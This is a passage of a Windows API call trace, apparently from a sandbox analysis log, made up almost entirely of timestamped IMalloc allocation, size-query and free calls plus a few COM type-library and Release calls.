IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.278] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.279] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.279] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.280] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.280] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.280] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.280] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.280] IMalloc:Free (This=0x7fefe015380, pv=0x7666c60) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666c90) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666090) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666cf0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666ba0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666b70) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666b10) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dba00) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666ae0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666ab0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666a80) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666a50) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76669f0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666990) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666960) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666930) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666900) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76668d0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76db7c0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc00) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbbc0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbd40) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76668a0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666840) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666810) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76667e0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76667b0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc40) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc80) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666780) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666750) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76666f0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe00) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe40) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe80) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76dbec0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76666c0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666690) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666660) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666630) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.281] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.281] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbec0 [0031.281] IMalloc:Alloc (This=0x7fefe015380, cb=0x34) returned 0x76dbe80 [0031.281] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76664b0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76664e0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666540 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666570 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76665a0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76665d0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918d0 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.282] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e67d0 [0031.282] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e67d0) returned 0x40 [0031.286] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e67d0 [0031.286] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e67d0) returned 0x40 [0031.288] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.288] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.288] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.288] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491450) returned 0x10 [0031.289] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e67d0 [0031.289] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e67d0) returned 0x40 [0031.289] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666630 [0031.289] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666630) returned 0x28 [0031.289] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666630 [0031.289] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666630) returned 0x28 [0031.290] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666630 [0031.290] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666630) returned 0x28 [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76dbec0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe80) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.290] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.290] ITypeInfo:GetImplTypeFlags (in: This=0xb4ce980, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.290] IUnknown:Release (This=0x780bbe8) returned 0x2 [0031.290] ITypeInfo:GetImplTypeFlags (in: This=0xb4ce980, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.290] IUnknown:Release (This=0x780c548) returned 0x2 [0031.290] IUnknown:Release (This=0xb4cd850) returned 0x1 [0031.290] IUnknown:Release (This=0xb4ce928) returned 0x1 [0031.290] IUnknown:Release (This=0xb4ce980) returned 0x1 [0031.290] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cea30) returned 0x0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbe80 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76665d0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76665a0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbec0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666570 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbe40 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666540 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76664e0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76664b0 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666630 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666660 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666690 [0031.291] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76666c0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76666f0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666750 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666780 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76667b0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbe00 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76667e0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666810 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666840 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76668a0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76668d0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666900 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666930 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666960 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666990 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76669f0 [0031.292] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbc80 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbc40 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbd40 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbbc0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666a50 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666a80 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbc00 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76db7c0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666ab0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666ae0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666b10 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666b70 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666ba0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dba00 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76db480 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666bd0 [0031.293] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c00 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667680 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbb80 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbb40 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666f60 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667020 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7667110 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666e70 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666de0 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666db0 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666d50 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666d20 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918d0 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.294] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a50 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.295] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917d0 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.296] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491570 [0031.296] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x18 [0031.301] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.301] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.301] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.301] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.302] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.302] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.302] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666cf0 [0031.302] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666cf0) returned 0x20 [0031.302] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbf00 [0031.302] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dbf00) returned 0x30 [0031.302] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6910 [0031.302] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6910) returned 0x48 [0031.303] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.303] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.303] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.303] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.303] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.303] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.304] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.304] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.304] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.304] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.304] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.304] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.304] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.304] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.305] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.305] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.305] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.305] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.305] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.305] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.305] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.305] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.305] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.305] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.306] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.306] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.306] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.306] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.306] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.306] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.306] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.306] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.307] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.307] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.307] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.307] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.307] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.307] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.307] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.307] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.307] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.307] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.308] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.308] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.308] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.308] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.308] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.308] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.308] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.308] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.308] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.308] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.309] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.309] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.309] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.309] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.309] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.309] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.309] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.309] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.309] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.309] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.310] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.310] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.310] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.310] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.310] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.310] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.311] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.311] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.311] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.311] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.311] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.311] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.311] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.311] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 [0031.312] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.312] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.312] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.312] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491570) returned 0x10 